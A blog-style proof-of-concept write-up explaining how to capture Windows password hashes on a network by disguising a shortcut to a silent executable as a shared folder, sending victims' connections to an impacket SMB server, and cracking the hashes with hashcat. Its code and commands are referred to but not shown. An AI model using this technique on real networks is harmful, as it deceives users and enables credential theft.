Capturing hashes with hidden folders, lnk files and smbserver by @_markmo_
I saw some malware using hidden folders and lnk files to execute a malicious payload. I thought, why not use that to capture hashes instead. This has probably been done before. However, it was interesting enough to me to do a proof of concept and reshare the idea.
This assumes you have an initial foot hold on a network. The ideal situation is to find a common folders location where you have write access and lots of people go. It could be a shared documentation folder or any cluster of folders that lots of people visit.
This might bypass anti-virus as the exe doesn’t do anything malicious and it might bypass user behavior analytics as the user is initiating the connection.
Right, lets get to work. The first thing we want to do is create a folder and a file where we want to direct our smb server connection to
Next we start our SMBServer to listen for incoming connections (here is the python for that https://github.com/CoreSecurity/impacket/blob/master/examples/smbserver.py
Now we select the folder we are going to target. Again, this could be something like a shared documentation folder root. I’m using one folder just as a proof of concept. If I write a tool I would recursively target folders
Now that we have the path to our folder, we need to create a quick program to do two things.
1. Make a connection to our responder share
2. Take the user to the folder that they clicked on so they don’t know anything is happening
Here is the entire program. Its really just two lines of code with some empty try catch. I chose a Windows form application and commented out the first three lines so the user doesn’t see any visual indication of what is occurring. I was a little lazy and used a new explorer to take the user to their destination. Otherwise I would have had to grab the existing process and have it navigate to their folder. You get the idea though.
Take the exe and drop it into one of the real target folders destination (under original folder) and right click and copy it
Now we go back to “original folder” and PASTE SHORTCUT to the runme.exe
Next rename the shortcut to “OrginalFolder”
Change the icon by right clicking, select properties and change the icon.
Select the icon that looks the most like a folder
Your folder should look like this
Next we will mark the REAL folder’s property as “hidden” by right clicking on the folder and changing it to hidden
When you hit apply it will only look like the replaced “folder” is there!
Now when the user clicks on the folder it will visit the smbserver share before taking them to their destination folder because this really pointing at an exe.
So USER CLICKS what they think is a folder and it takes them to where they want to go (the real destination they wanted to get to)
HOWEVER, SMBserver has done its work because they made a connection to our SMBserver.
All we need to do is crack their password with hashcat (I’m using what was install on kali linux)
Copy the highlighted info into a text file
Simple command here
And run hashcat against it
And you can see it was cracked with my awesome password
I hope you enjoyed my first write up.
